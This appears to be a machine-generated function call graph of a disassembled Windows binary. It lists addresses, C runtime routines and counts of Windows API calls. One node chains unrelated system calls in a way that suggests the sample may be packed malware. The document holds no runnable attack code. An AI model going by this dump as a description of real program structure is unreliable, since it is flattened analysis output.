6632->6633 6634 4010ad ___free_lconv_mon 67 API calls 6633->6634 6635 408a16 6634->6635 6636 4010ad ___free_lconv_mon 67 API calls 6635->6636 6637 408a1d 6636->6637 6638 4010ad ___free_lconv_mon 67 API calls 6637->6638 6639 408a25 6638->6639 6640 4010ad ___free_lconv_mon 67 API calls 6639->6640 6641 408a2d 6640->6641 6642 4010ad ___free_lconv_mon 67 API calls 6641->6642 6643 408a35 6642->6643 6644 4010ad ___free_lconv_mon 67 API calls 6643->6644 6645 408a3d 6644->6645 6646 4010ad ___free_lconv_mon 67 API calls 6645->6646 6647 408a45 6646->6647 6648 4010ad ___free_lconv_mon 67 API calls 6647->6648 6649 408a4d 6648->6649 6650 4010ad ___free_lconv_mon 67 API calls 6649->6650 6651 408a55 6650->6651 6652 4010ad ___free_lconv_mon 67 API calls 6651->6652 6653 408a5d 6652->6653 6654 4010ad ___free_lconv_mon 67 API calls 6653->6654 6655 408a65 6654->6655 6656 4010ad ___free_lconv_mon 67 API calls 6655->6656 6657 408a70 6656->6657 6658 4010ad ___free_lconv_mon 67 API calls 6657->6658 6659 408a78 6658->6659 6660 4010ad ___free_lconv_mon 67 API calls 6659->6660 6661 408a80 6660->6661 6662 4010ad ___free_lconv_mon 67 API calls 6661->6662 6663 408a88 6662->6663 6664 4010ad ___free_lconv_mon 67 API calls 6663->6664 6665 408a90 6664->6665 6666 4010ad ___free_lconv_mon 67 API calls 6665->6666 6667 408a98 6666->6667 6668 4010ad ___free_lconv_mon 67 API calls 6667->6668 6669 408aa0 6668->6669 6670 4010ad ___free_lconv_mon 67 API calls 6669->6670 6671 408aa8 6670->6671 6672 4010ad ___free_lconv_mon 67 API calls 6671->6672 6673 408ab0 6672->6673 6674 4010ad ___free_lconv_mon 67 API calls 6673->6674 6675 408ab8 6674->6675 6676 4010ad ___free_lconv_mon 67 API calls 6675->6676 6677 408ac0 6676->6677 6678 4010ad ___free_lconv_mon 67 API calls 6677->6678 6679 408ac8 6678->6679 6680 4010ad ___free_lconv_mon 67 API calls 6679->6680 6681 408ad0 6680->6681 6682 4010ad ___free_lconv_mon 67 API calls 6681->6682 6683 408ad8 6682->6683 6684 4010ad ___free_lconv_mon 67 API calls 6683->6684 6685 408ae0 6684->6685 6686 4010ad ___free_lconv_mon 67 API calls 6685->6686 6687 408ae8 6686->6687 6688 4010ad ___free_lconv_mon 67 API calls 6687->6688 6689 408af6 6688->6689 6690 4010ad ___free_lconv_mon 67 API calls 6689->6690 6691 408b01 6690->6691 6692 4010ad ___free_lconv_mon 67 API calls 6691->6692 6693 408b0c 6692->6693 6694 4010ad ___free_lconv_mon 67 API calls 6693->6694 6695 408b17 6694->6695 6696 4010ad ___free_lconv_mon 67 API calls 6695->6696 6697 408b22 6696->6697 6698 4010ad ___free_lconv_mon 67 API calls 6697->6698 6699 408b2d 6698->6699 6700 4010ad ___free_lconv_mon 67 API calls 6699->6700 6701 408b38 6700->6701 6702 4010ad ___free_lconv_mon 67 API calls 6701->6702 6703 408b43 6702->6703 6704 4010ad ___free_lconv_mon 67 API calls 6703->6704 6705 408b4e 6704->6705 6706 4010ad ___free_lconv_mon 67 API calls 6705->6706 6707 408b59 6706->6707 6708 4010ad ___free_lconv_mon 67 API calls 6707->6708 6708->6623 6709->6552 6713 402781 LeaveCriticalSection 6710->6713 6712 405f82 6712->6531 6713->6712 6715 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 6714->6715 6716 4069f7 6715->6716 6717 408993 6716->6717 6718 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 6717->6718 6719 4089a6 6718->6719 6722 4087d9 6719->6722 6723 408825 6722->6723 6724 4087fa GetStringTypeW 6722->6724 6725 40890c 6723->6725 6726 408812 6723->6726 6724->6726 6727 40881a GetLastError 6724->6727 6750 409824 GetLocaleInfoA 6725->6750 6728 40885e MultiByteToWideChar 6726->6728 6730 408906 6726->6730 6727->6723 6728->6730 6735 40888b 6728->6735 6732 401006 __ftelli64_nolock 5 API calls 6730->6732 6733 408991 6732->6733 6733->6505 6734 40895d GetStringTypeA 6734->6730 6738 408978 6734->6738 6739 4088a0 _memset __crtLCMapStringA_stat 6735->6739 6740 4011ca _malloc 67 API calls 6735->6740 6737 4088d9 MultiByteToWideChar 6742 408900 6737->6742 6743 4088ef GetStringTypeW 6737->6743 6744 4010ad ___free_lconv_mon 67 API calls 6738->6744 6739->6730 6739->6737 6740->6739 6746 4083cf 6742->6746 6743->6742 6744->6730 6747 4083db 6746->6747 6748 4083ec 6746->6748 6747->6748 6749 4010ad ___free_lconv_mon 67 API calls 6747->6749 6748->6730 6749->6748 6751 409857 6750->6751 6753 409852 6750->6753 6752 401302 ___ansicp 90 API calls 6751->6752 6752->6753 6754 401006 __ftelli64_nolock 5 API calls 6753->6754 6755 408930 6754->6755 6755->6730 6755->6734 6756 40986d 6755->6756 6757 409937 6756->6757 6758 4098ad GetCPInfo 6756->6758 6761 401006 __ftelli64_nolock 5 API calls 6757->6761 6759 409922 MultiByteToWideChar 6758->6759 6760 4098c4 6758->6760 6759->6757 6765 4098dd _strlen 6759->6765 6760->6759 6762 4098ca GetCPInfo 6760->6762 6763 408951 6761->6763 6762->6759 6764 4098d7 6762->6764 6763->6730 6763->6734 6764->6759 6764->6765 6766 4011ca _malloc 67 API calls 6765->6766 6768 40990f _memset __crtLCMapStringA_stat 6765->6768 6766->6768 6767 40996c MultiByteToWideChar 6769 4099a3 6767->6769 6770 409984 6767->6770 6768->6757 6768->6767 6771 4083cf __freea 67 API calls 6769->6771 6772 4099a8 6770->6772 6773 40998b WideCharToMultiByte 6770->6773 6771->6757 6774 4099b3 WideCharToMultiByte 6772->6774 6775 4099c7 6772->6775 6773->6769 6774->6769 6774->6775 6776 406728 __calloc_crt 67 API calls 6775->6776 6777 4099cf 6776->6777 6777->6769 6778 4099d8 WideCharToMultiByte 6777->6778 6778->6769 6779 4099ea 6778->6779 6780 4010ad ___free_lconv_mon 67 API calls 6779->6780 6780->6769 6782 4042c2 6781->6782 6783 4042d8 EnterCriticalSection 6781->6783 6784 40285b __lock 67 API calls 6782->6784 6783->6425 6785 4042cb 6784->6785 6785->6425 6801 405c88 6786->6801 6790 4043b4 6790->6428 6791 404367 _printf 6791->6790 6792 4066e3 __malloc_crt 67 API calls 6791->6792 6792->6790 6794 4013a7 6793->6794 6795 4043f9 6793->6795 6797 4013bf 6794->6797 6795->6794 6816 407a93 6795->6816 6798 4013c4 _printf 6797->6798 6958 404323 6798->6958 6800 4013cf 6800->6426 6802 404361 6801->6802 6803 405c97 6801->6803 6807 405c24 6802->6807 6804 402666 __cftof2_l 67 API calls 6803->6804 6805 405c9c 6804->6805 6806 4025fe __cftof2_l 6 API calls 6805->6806 6806->6802 6808 405c31 6807->6808 6810 405c40 6807->6810 6809 402666 __cftof2_l 67 API calls 6808->6809 6813 405c36 6809->6813 6811 405c64 6810->6811 6812 402666 __cftof2_l 67 API calls 6810->6812 6811->6791 6814 405c54 6812->6814 6813->6791 6815 4025fe __cftof2_l 6 API calls 6814->6815 6815->6811 6817 407ace 6816->6817 6818 407aac 6816->6818 6817->6794 6818->6817 6819 405c88 __fileno 67 API calls 6818->6819 6820 407ac7 6819->6820 6822 405aff 6820->6822 6823 405b0b _flsall 6822->6823 6824 405b13 6823->6824 6825 405b2e 6823->6825 6847 402679 6824->6847 6826 405b3c 6825->6826 6831 405b7d 6825->6831 6828 402679 __close 67 API calls 6826->6828 6830 405b41 6828->6830 6833 402666 __cftof2_l 67 API calls 6830->6833 6850 408112 6831->6850 6832 402666 __cftof2_l 67 API calls 6835 405b20 _flsall 6832->6835 6836 405b48 6833->6836 6835->6817 6838 4025fe __cftof2_l 6 API calls 6836->6838 6837 405b83 6839 405b90 6837->6839 6840 405ba6 6837->6840 6838->6835 6860 4053cc 6839->6860 6841 402666 __cftof2_l 67 API calls 6840->6841 6843 405bab 6841->6843 6845 402679 __close 67 API calls 6843->6845 6844 405b9e 6919 405bd1 6844->6919 6845->6844 6848 404e41 __getptd_noexit 67 API calls 6847->6848 6849 40267e 6848->6849 6849->6832 6851 40811e _flsall 6850->6851 6852 408179 6851->6852 6855 40285b __lock 67 API calls 6851->6855 6853 40819b _flsall 6852->6853 6854 40817e EnterCriticalSection 6852->6854 6853->6837 6854->6853 6856 40814a 6855->6856 6857 408161 6856->6857 6859 406b59 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6856->6859 6922 4081a9 6857->6922 6859->6857 6861 4053db __ftelli64_nolock 6860->6861 6862 405434 6861->6862 6863 40540d 6861->6863 6893 405402 6861->6893 6866 40549c 6862->6866 6867 405476 6862->6867 6865 402679 __close 67 API calls 6863->6865 6864 401006 __ftelli64_nolock 5 API calls 6868 405afd 6864->6868 6869 405412 6865->6869 6871 4054b0 6866->6871 6926 40522e 6866->6926 6870 402679 __close 67 API calls 6867->6870 6868->6844 6872 402666 __cftof2_l 67 API calls 6869->6872 6874 40547b 6870->6874 6873 405c24 __flsbuf 67 API calls 6871->6873 6876 405419 6872->6876 6878 4054bb 6873->6878 6879 402666 __cftof2_l 67 API calls 6874->6879 6877 4025fe __cftof2_l 6 API calls 6876->6877 6877->6893 6880 405761 6878->6880 6885 404eba __getptd 67 API calls 6878->6885 6881 405484 6879->6881 6883 405a30 WriteFile 6880->6883 6884 405771 6880->6884 6882 4025fe __cftof2_l 6 API calls 6881->6882 6882->6893 6888 405a63 GetLastError 6883->6888 6889 405743 6883->6889 6886 40584f 6884->6886 6909 405785 6884->6909 6887 4054d6 GetConsoleMode 6885->6887 6908 40592f 6886->6908 6911 40585e 6886->6911 6887->6880 6891 405501 6887->6891 6888->6889 6890 405aae 6889->6890 6889->6893 6894 405a81 6889->6894 6890->6893 6895 402666 __cftof2_l 67 API calls 6890->6895 6891->6880 6892 405513 GetConsoleCP 6891->6892 6892->6889 6917 405536 6892->6917 6893->6864 6897 405aa0 6894->6897 6898 405a8c 6894->6898 6900 405ad1 6895->6900 6896 405995 WideCharToMultiByte 6896->6888 6903 4059cc WriteFile 6896->6903 6939 40268c 6897->6939 6902 402666 __cftof2_l 67 API calls 6898->6902 6899 4057f3 WriteFile 6899->6888 6899->6909 6901 402679 __close 67 API calls 6900->6901 6901->6893 6906 405a91 6902->6906 6907 405a03 GetLastError 6903->6907 6903->6908 6904 4058d3 WriteFile 6904->6888 6904->6911 6910 402679 __close 67 API calls 6906->6910 6907->6908 6908->6889 6908->6890 6908->6896 6908->6903 6909->6889 6909->6890 6909->6899 6910->6893 6911->6889 6911->6890 6911->6904 6913 4081d9 11 API calls __putwch_nolock 6913->6917 6914 4055e2 WideCharToMultiByte 6914->6889 6916 405613 WriteFile 6914->6916 6915 4083b5 79 API calls __fassign 6915->6917 6916->6888 6916->6917 6917->6888 6917->6889 6917->6913 6917->6914 6917->6915 6918 405667 WriteFile 6917->6918 6936 406a1c 6917->6936 6918->6888 6918->6917 6957 4081b2 LeaveCriticalSection 6919->6957 6921 405bd9 6921->6835 6925 402781 LeaveCriticalSection 6922->6925 6924 4081b0 6924->6852 6925->6924 6944 40809b 6926->6944 6928 40524c 6929 405254 6928->6929 6930 405265 SetFilePointer 6928->6930 6931 402666 __cftof2_l 67 API calls 6929->6931 6932 40527d GetLastError 6930->6932 6933 405259 6930->6933 6931->6933 6932->6933 6934 405287 6932->6934 6933->6871 6935 40268c __dosmaperr 67 API calls 6934->6935 6935->6933 6937 4069e4 __isleadbyte_l 77 API calls 6936->6937 6938 406a2b 6937->6938 6938->6917 6940 402679 __close 67 API calls 6939->6940 6941 402697 __dosmaperr 6940->6941 6942 402666 __cftof2_l 67 API calls 6941->6942 6943 4026aa 6942->6943 6943->6893 6945 4080c0 6944->6945 6946 4080a8 6944->6946 6949 402679 __close 67 API calls 6945->6949 6956 408105 6945->6956 6947 402679 __close 67 API calls 6946->6947 6948 4080ad 6947->6948 6950 402666 __cftof2_l 67 API calls 6948->6950 6951 4080ee 6949->6951 6952 4080b5 6950->6952 6953 402666 __cftof2_l 67 API calls 6951->6953 6952->6928 6954 4080f5 6953->6954 6955 4025fe __cftof2_l 6 API calls 6954->6955 6955->6956 6956->6928 6957->6921 6959 404333 6958->6959 6960 404346 LeaveCriticalSection 6958->6960 6963 402781 LeaveCriticalSection 6959->6963 6960->6800 6962 404343 6962->6800 6963->6962 6965 401042 6964->6965 6966 401025 6964->6966 6965->6966 6969 401049 6965->6969 6967 402666 __cftof2_l 67 API calls 6966->6967 6968 40102a 6967->6968 6970 4025fe __cftof2_l 6 API calls 6968->6970 6971 40103a 6969->6971 6973 40169e 6969->6973 6970->6971 6971->6397 6974 405c88 __fileno 67 API calls 6973->6974 6975 4016ae 6974->6975 6976 4016d0 6975->6976 6977 4016b9 6975->6977 6979 4016d4 6976->6979 6987 4016e1 _printf 6976->6987 6978 402666 __cftof2_l 67 API calls 6977->6978 6986 4016be 6978->6986 6980 402666 __cftof2_l 67 API calls 6979->6980 6980->6986 6981 4017d1 6983 405aff __locking 101 API calls 6981->6983 6982 401751 6984 401768 6982->6984 6989 401785 6982->6989 6983->6986 6985 405aff __locking 101 API calls 6984->6985 6985->6986 6986->6971 6987->6986 6988 405c24 __flsbuf 67 API calls 6987->6988 6990 401737 6987->6990 6993 401742 6987->6993 6988->6990 6989->6986 6997 4052b3 6989->6997 6990->6993 6994 405bdb 6990->6994 6993->6981 6993->6982 6995 4066e3 __malloc_crt 67 API calls 6994->6995 6996 405bf0 6995->6996 6996->6993 6998 4052bf _flsall 6997->6998 6999 4052d0 6998->6999 7000 4052ec 6998->7000 7001 402679 __close 67 API calls 6999->7001 7002 4052fa 7000->7002 7004 40531b 7000->7004 7003 4052d5 7001->7003 7005 402679 __close 67 API calls 7002->7005 7008 402666 __cftof2_l 67 API calls 7003->7008 7006 405361 7004->7006 7007 40533b 7004->7007 7009 4052ff 7005->7009 7011 408112 ___lock_fhandle 68 API calls 7006->7011 7010 402679 __close 67 API calls 7007->7010 7022 4052dd _flsall 7008->7022 7012 402666 __cftof2_l 67 API calls 7009->7012 7013 405340 7010->7013 7014 405367 7011->7014 7015 405306 7012->7015 7017 402666 __cftof2_l 67 API calls 7013->7017 7018 405390 7014->7018 7019 405374 7014->7019 7016 4025fe __cftof2_l 6 API calls 7015->7016 7016->7022 7021 405347 7017->7021 7020 402666 __cftof2_l 67 API calls 7018->7020 7023 40522e __lseeki64_nolock 69 API calls 7019->7023 7024 405395 7020->7024 7025 4025fe __cftof2_l 6 API calls 7021->7025 7022->6986 7026 405385 7023->7026 7027 402679 __close 67 API calls 7024->7027 7025->7022 7029 4053c2 7026->7029 7027->7026 7032 4081b2 LeaveCriticalSection 7029->7032 7031 4053ca 7031->7022 7032->7031 7034 407b4f _flsall 7033->7034 7035 40285b __lock 67 API calls 7034->7035 7037 407b5e 7035->7037 7036 407bf6 7046 407c14 7036->7046 7037->7036 7039 4042b5 _flsall 68 API calls 7037->7039 7042 407afb 105 API calls __fflush_nolock 7037->7042 7043 407be5 7037->7043 7039->7037 7040 407c02 _flsall 7040->6444 7042->7037 7044 404323 _printf 2 API calls 7043->7044 7045 407bf3 7044->7045 7045->7037 7049 402781 LeaveCriticalSection 7046->7049 7048 407c1b 7048->7040 7049->7048 7051 403f05 _flsall 7050->7051 7058 404274 7051->7058 7057 403f2d _flsall 7057->6456 7059 404286 7058->7059 7060 4042a8 EnterCriticalSection 7058->7060 7059->7060 7061 40428e 7059->7061 7063 403f0d 7060->7063 7062 40285b __lock 67 API calls 7061->7062 7062->7063 7064 403bad 7063->7064 7065 403bbc __ftelli64_nolock 7064->7065 7066 405c88 __fileno 67 API calls 7065->7066 7067 403bd2 7066->7067 7068 4052b3 __lseeki64 71 API calls 7067->7068 7069 403bef 7068->7069 7070 403dd2 7069->7070 7071 403c78 7069->7071 7086 403c0a 7069->7086 7073 403dd6 7070->7073 7077 403d9e 7070->7077 7075 403c90 7071->7075 7071->7077 7072 401006 __ftelli64_nolock 5 API calls 7074 403ef7 7072->7074 7076 402666 __cftof2_l 67 API calls 7073->7076 7087 403f39 7074->7087 7078 4052b3 __lseeki64 71 API calls 7075->7078 7075->7086 7076->7086 7080 4052b3 __lseeki64 71 API calls 7077->7080 7077->7086 7079 403cc0 7078->7079 7081 403ce3 ReadFile 7079->7081 7079->7086 7082 403e24 7080->7082 7083 403d08 7081->7083 7081->7086 7084 4052b3 __lseeki64 71 API calls 7082->7084 7082->7086 7085 4052b3 __lseeki64 71 API calls 7083->7085 7084->7086 7085->7086 7086->7072 7090 4042e7 7087->7090 7089 403f41 7089->7057 7091 404317 LeaveCriticalSection 7090->7091 7092 4042f8 7090->7092 7091->7089 7092->7091 7093 4042ff 7092->7093 7096 402781 LeaveCriticalSection 7093->7096 7095 404314 7095->7089 7096->7095 7098 42360a GetCommProperties LoadLibraryA 7097->7098 7099 42361e 7097->7099 7098->7099 7100 401006 __ftelli64_nolock 5 API calls 7099->7100 7101 423628 7100->7101 7101->6467 7101->6468 7103 423664 GetNumaHighestNodeNumber 7102->7103 7105 423667 7102->7105 7103->7105 7104 4236e4 7106 401006 __ftelli64_nolock 5 API calls 7104->7106 7105->7104 7109 4236a2 GetNumaHighestNodeNumber SetCalendarInfoW OpenJobObjectA GetShortPathNameA Sleep 7105->7109 7110 42362a 7105->7110 7108 423708 7106->7108 7108->6471 7108->6472 7109->7105 7113 4235a9 7110->7113 7114 4235c5 VirtualUnlock 7113->7114 7115 4235cf 7113->7115 7114->7115 7115->7105 7117 404c65 _raise 6 API calls 7116->7117 7118 40394c __init_pointers __initp_misc_winsig 7117->7118 7133 407344 7118->7133 7121 404bf3 __encode_pointer 6 API calls 7122 403988 7121->7122 7122->5854 7124 4026ea 7123->7124 7125 406b59 __mtinitlocknum InitializeCriticalSectionAndSpinCount 7124->7125 7126 402718 7124->7126 7125->7124 7126->5844 7126->5864 7128 404d27 7127->7128 7129 404d33 7127->7129 7132 404c6e __decode_pointer 6 API calls 7128->7132 7130 404d55 7129->7130 7131 404d47 TlsFree 7129->7131 7130->7130 7131->7130 7132->7129 7134 404bf3 __encode_pointer 6 API calls 7133->7134 7135 40397e 7134->7135 7135->7121 7137 4037da _flsall 7136->7137 7138 40285b __lock 67 API calls 7137->7138 7139 4037e1 7138->7139 7141 404c6e __decode_pointer 6 API calls 7139->7141 7145 40389a __initterm 7139->7145 7143 403818 7141->7143 7143->7145 7147 404c6e __decode_pointer 6 API calls 7143->7147 7144 4038e2 _flsall 7144->5886 7153 4038e5 7145->7153 7152 40382d 7147->7152 7148 4038d9 7149 4036de _fast_error_exit 3 API calls 7148->7149 7149->7144 7150 404c6e 6 API calls __decode_pointer 7150->7152 7151 404c65 6 API calls _raise 7151->7152 7152->7145 7152->7150 7152->7151 7154 4038c6 7153->7154 7155 4038eb 7153->7155 7154->7144 7157 402781 LeaveCriticalSection 7154->7157 7158 402781 LeaveCriticalSection 7155->7158 7157->7148 7158->7154 7307 406000 7317 405f84 7307->7317 7309 40602b setSBCS 7312 401006 __ftelli64_nolock 5 API calls 7309->7312 7311 406094 _memset __setmbcp_nolock 7324 405d4d GetCPInfo 7311->7324 7313 4061e3 7312->7313 7314 40606f IsValidCodePage 7314->7309 7315 406081 GetCPInfo 7314->7315 7315->7309 7315->7311 7318 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7317->7318 7319 405f98 7318->7319 7320 405fc1 7319->7320 7321 405fa3 GetOEMCP 7319->7321 7322 405fc6 GetACP 7320->7322 7323 405fb3 7320->7323 7321->7323 7322->7323 7323->7309 7323->7311 7323->7314 7325 405e33 7324->7325 7329 405d81 _memset 7324->7329 7328 401006 __ftelli64_nolock 5 API calls 7325->7328 7326 408993 ___crtGetStringTypeA 91 API calls 7327 405dee 7326->7327 7334 408794 7327->7334 7331 405ede 7328->7331 7329->7326 7331->7311 7333 408794 ___crtLCMapStringA 102 API calls 7333->7325 7335 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7334->7335 7336 4087a7 7335->7336 7339 4083ef 7336->7339 7340 408410 LCMapStringW 7339->7340 7343 40842b 7339->7343 7341 408433 GetLastError 7340->7341 7340->7343 7341->7343 7342 408629 7345 409824 ___ansicp 91 API calls 7342->7345 7343->7342 7344 408485 7343->7344 7346 40849e MultiByteToWideChar 7344->7346 7369 408620 7344->7369 7347 408651 7345->7347 7352 4084cb 7346->7352 7346->7369 7350 408745 LCMapStringA 7347->7350 7351 40866a 7347->7351 7347->7369 7348 401006 __ftelli64_nolock 5 API calls 7349 405e0e 7348->7349 7349->7333 7353 4086a1 7350->7353 7354 40986d ___convertcp 74 API calls 7351->7354 7357 4011ca _malloc 67 API calls 7352->7357 7366 4084e4 __crtLCMapStringA_stat 7352->7366 7356 40876c 7353->7356 7362 4010ad ___free_lconv_mon 67 API calls 7353->7362 7358 40867c 7354->7358 7355 40851c MultiByteToWideChar 7359 408535 LCMapStringW 7355->7359 7360 408617 7355->7360 7367 4010ad ___free_lconv_mon 67 API calls 7356->7367 7356->7369 7357->7366 7363 408686 LCMapStringA 7358->7363 7358->7369 7359->7360 7361 408556 7359->7361 7364 4083cf __freea 67 API calls 7360->7364 7365 40855f 7361->7365 7371 408588 7361->7371 7362->7356 7363->7353 7372 4086a8 7363->7372 7364->7369 7365->7360 7368 408571 LCMapStringW 7365->7368 7366->7355 7366->7369 7367->7369 7368->7360 7369->7348 7370 4085d7 LCMapStringW 7373 408611 7370->7373 7374 4085ef WideCharToMultiByte 7370->7374 7376 4085a3 __crtLCMapStringA_stat 7371->7376 7378 4011ca _malloc 67 API calls 7371->7378 7375 4011ca _malloc 67 API calls 7372->7375 7377 4086b9 _memset __crtLCMapStringA_stat 7372->7377 7379 4083cf __freea 67 API calls 7373->7379 7374->7373 7375->7377 7376->7360 7376->7370 7377->7353 7380 4086f7 LCMapStringA 7377->7380 7378->7376 7379->7360 7382 408713 7380->7382 7383 408717 7380->7383 7385 4083cf __freea 67 API calls 7382->7385 7384 40986d ___convertcp 74 API calls 7383->7384 7384->7382 7385->7353 7159 406346 7162 402781 LeaveCriticalSection 7159->7162 7161 40634d 7162->7161 7649 4069c7 7652 40685b 7649->7652 7653 406872 7652->7653 7654 4068b3 7653->7654 7655 406898 7653->7655 7672 406876 7653->7672 7657 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7654->7657 7656 402666 __cftof2_l 67 API calls 7655->7656 7658 40689d 7656->7658 7659 4068be 7657->7659 7660 4025fe __cftof2_l 6 API calls 7658->7660 7661 406966 WideCharToMultiByte 7659->7661 7662 4068ca 7659->7662 7660->7672 7663 406998 GetLastError 7661->7663 7668 4068d8 _memset 7661->7668 7664 40690e _memset 7662->7664 7662->7668 7663->7664 7663->7668 7667 402666 __cftof2_l 67 API calls 7664->7667 7664->7672 7665 402666 __cftof2_l 67 API calls 7666 4068f0 7665->7666 7669 402666 __cftof2_l 67 API calls 7666->7669 7670 40691b 7667->7670 7668->7665 7668->7672 7669->7672 7671 4025fe __cftof2_l 6 API calls 7670->7671 7671->7672 7766 407287 7767 406728 __calloc_crt 67 API calls 7766->7767 7768 407293 7767->7768 7769 404bf3 __encode_pointer 6 API calls 7768->7769 7770 40729b 7769->7770 7386 423d0f 7389 423b83 7386->7389 7390 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7389->7390 7391 423b97 7390->7391 7398 409d0b 7391->7398 7393 423bb7 7394 409d0b __forcdecpt_l 102 API calls 7393->7394 7397 423bc0 7394->7397 7396 423ba3 7396->7393 7402 4095d6 7396->7402 7399 409d29 7398->7399 7400 409d19 7398->7400 7407 409bf6 7399->7407 7400->7396 7403 4095e4 7402->7403 7404 4095f6 7402->7404 7403->7396 7419 409585 7404->7419 7408 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7407->7408 7409 409c0b 7408->7409 7410 409c17 7409->7410 7411 409c6b 7409->7411 7413 4078fb __isctype_l 91 API calls 7410->7413 7418 409c2f 7410->7418 7412 409c90 7411->7412 7414 4069e4 __isleadbyte_l 77 API calls 7411->7414 7415 402666 __cftof2_l 67 API calls 7412->7415 7416 409c96 7412->7416 7413->7418 7414->7412 7415->7416 7417 408794 ___crtLCMapStringA 102 API calls 7416->7417 7417->7418 7418->7400 7420 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7419->7420 7421 409598 7420->7421 7422 4095b2 7421->7422 7423 4078fb __isctype_l 91 API calls 7421->7423 7422->7396 7423->7422 7771 40158e 7774 405190 7771->7774 7773 401593 7773->7773 7775 4051c2 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 7774->7775 7776 4051b5 7774->7776 7777 4051b9 7775->7777 7776->7775 7776->7777 7777->7773 7163 40154f 7164 401564 7163->7164 7165 40155e 7163->7165 7172 403935 7164->7172 7169 403910 7165->7169 7168 401569 _flsall 7170 4037ce _doexit 67 API calls 7169->7170 7171 403921 7170->7171 7171->7164 7173 4037ce _doexit 67 API calls 7172->7173 7174 403940 7173->7174 7174->7168 7778 406b91 7779 406b9d SetLastError 7778->7779 7780 406ba5 _flsall 7778->7780 7779->7780 7175 404254 7176 407c1d ___endstdio 105 API calls 7175->7176 7177 404259 7176->7177 7178 404267 7177->7178 7182 4079f4 7177->7182 7180 4010ad ___free_lconv_mon 67 API calls 7178->7180 7181 404272 7180->7181 7183 407a00 _flsall 7182->7183 7184 40285b __lock 67 API calls 7183->7184 7191 407a0c 7184->7191 7185 407a75 7205 407a8a 7185->7205 7187 407a81 _flsall 7187->7178 7188 407a4a DeleteCriticalSection 7190 4010ad ___free_lconv_mon 67 API calls 7188->7190 7190->7191 7191->7185 7191->7188 7192 40967b 7191->7192 7193 409687 _flsall 7192->7193 7194 4096b8 7193->7194 7195 40969b 7193->7195 7197 404274 __lock_file 68 API calls 7194->7197 7203 4096b0 _flsall 7194->7203 7196 402666 __cftof2_l 67 API calls 7195->7196 7198 4096a0 7196->7198 7199 4096d0 7197->7199 7200 4025fe __cftof2_l 6 API calls 7198->7200 7208 409604 7199->7208 7200->7203 7203->7191 7282 402781 LeaveCriticalSection 7205->7282 7207 407a91 7207->7187 7209 409634 7208->7209 7210 409618 7208->7210 7213 40962d 7209->7213 7214 407a93 __flush 101 API calls 7209->7214 7211 402666 __cftof2_l 67 API calls 7210->7211 7212 40961d 7211->7212 7215 4025fe __cftof2_l 6 API calls 7212->7215 7224 4096ef 7213->7224 7216 409640 7214->7216 7215->7213 7227 409bc5 7216->7227 7219 405c88 __fileno 67 API calls 7220 40964e 7219->7220 7231 409af8 7220->7231 7222 409654 7222->7213 7223 4010ad ___free_lconv_mon 67 API calls 7222->7223 7223->7213 7225 4042e7 _fgetpos 2 API calls 7224->7225 7226 4096f5 7225->7226 7226->7203 7228 409648 7227->7228 7229 409bd5 7227->7229 7228->7219 7229->7228 7230 4010ad ___free_lconv_mon 67 API calls 7229->7230 7230->7228 7232 409b04 _flsall 7231->7232 7233 409b27 7232->7233 7234 409b0c 7232->7234 7236 409b35 7233->7236 7239 409b76 7233->7239 7235 402679 __close 67 API calls 7234->7235 7237 409b11 7235->7237 7238 402679 __close 67 API calls 7236->7238 7240 402666 __cftof2_l 67 API calls 7237->7240 7241 409b3a 7238->7241 7243 408112 ___lock_fhandle 68 API calls 7239->7243 7249 409b19 _flsall 7240->7249 7242 402666 __cftof2_l 67 API calls 7241->7242 7244 409b41 7242->7244 7245 409b7c 7243->7245 7246 4025fe __cftof2_l 6 API calls 7244->7246 7247 409b97 7245->7247 7248 409b89 7245->7248 7246->7249 7251 402666 __cftof2_l 67 API calls 7247->7251 7254 409a5c 7248->7254 7249->7222 7252 409b91 7251->7252 7269 409bbb 7252->7269 7255 40809b __close_nolock 67 API calls 7254->7255 7258 409a6c 7255->7258 7256 409ac2 7272 408015 7256->7272 7258->7256 7260 40809b __close_nolock 67 API calls 7258->7260 7268 409aa0 7258->7268 7262 409a97 7260->7262 7261 40809b __close_nolock 67 API calls 7263 409aac CloseHandle 7261->7263 7266 40809b __close_nolock 67 API calls 7262->7266 7263->7256 7267 409ab8 GetLastError 7263->7267 7264 40268c __dosmaperr 67 API calls 7265 409aec 7264->7265 7265->7252 7266->7268 7267->7256 7268->7256 7268->7261 7281 4081b2 LeaveCriticalSection 7269->7281 7271 409bc3 7271->7249 7273 408081 7272->7273 7274 408026 7272->7274 7275 402666 __cftof2_l 67 API calls 7273->7275 7274->7273 7280 408051 7274->7280 7276 408086 7275->7276 7277 402679 __close 67 API calls 7276->7277 7278 408077 7277->7278 7278->7264 7278->7265 7279 408071 SetStdHandle 7279->7278 7280->7278 7280->7279 7281->7271 7282->7207 7673 423cd6 7676 423c94 7673->7676 7677 423cc0 7676->7677 7678 423ca7 7676->7678 7689 4247c5 7677->7689 7682 42471d 7678->7682 7681 423cb0 7683 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7682->7683 7684 424743 7683->7684 7696 425673 7684->7696 7686 42475b __ld12tod 7687 401006 __ftelli64_nolock 5 API calls 7686->7687 7688 4247c3 7687->7688 7688->7681 7690 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7689->7690 7691 4247eb 7690->7691 7692 425673 ___strgtold12_l 67 API calls 7691->7692 7693 424803 __ld12tod 7692->7693 7694 401006 __ftelli64_nolock 5 API calls 7693->7694 7695 42486b 7694->7695 7695->7681 7697 4256be 7696->7697 7703 4256dd 7696->7703 7698 402666 __cftof2_l 67 API calls 7697->7698 7699 4256c3 7698->7699 7700 4025fe __cftof2_l 6 API calls 7699->7700 7705 4256d3 7700->7705 7701 401006 __ftelli64_nolock 5 API calls 7702 425d38 7701->7702 7702->7686 7703->7705 7706 426acc 7703->7706 7705->7701 7707 426afe 7706->7707 7708 401006 __ftelli64_nolock 5 API calls 7707->7708 7709 426c98 7708->7709 7709->7705 7710 